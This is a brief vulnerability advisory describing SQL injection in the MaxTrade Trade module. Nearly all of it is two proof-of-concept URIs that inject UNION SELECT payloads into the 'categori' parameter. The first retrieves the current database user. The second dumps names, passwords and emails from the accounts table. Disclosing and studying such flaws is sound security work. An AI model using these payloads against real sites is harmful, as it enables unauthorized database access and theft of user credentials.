MaxTrade Trade Module SQL Injection Vulnerability

MaxTrade Trade Module SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com//modules.php?module=trade&function=pocategorisell&cat=0&stranica=menu&categori=-1+union+select+current_user,2/*
http://www.example.com//modules.php?module=trade&function=pocategorisell&cat=0&stranica=menu&categori=-1+union+select+concat_ws(0x3a3a,name,password,email),2+from+accounts/*